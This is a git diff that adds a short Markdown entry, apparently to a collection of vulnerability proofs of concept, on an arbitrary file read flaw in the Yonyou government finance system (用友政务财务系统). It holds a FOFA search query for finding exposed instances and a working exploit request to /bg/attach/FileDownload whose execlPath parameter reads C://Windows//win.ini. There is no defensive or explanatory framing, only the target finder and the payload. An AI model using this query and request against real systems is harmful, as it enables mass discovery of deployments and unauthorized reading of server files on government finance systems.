diff --git a/用友政务财务系统FileDownload存在任意文件读取漏洞.md b/用友政务财务系统FileDownload存在任意文件读取漏洞.md new file mode 100644 index 0000000..275408f --- /dev/null +++ b/用友政务财务系统FileDownload存在任意文件读取漏洞.md @@ -0,0 +1,12 @@ +## 用友政务财务系统FileDownload存在任意文件读取漏洞 + +## fofa +``` +app="用友-政务财务系统" +``` + +## poc +``` +/bg/attach/FileDownload?execlPath=C://Windows//win.ini + +```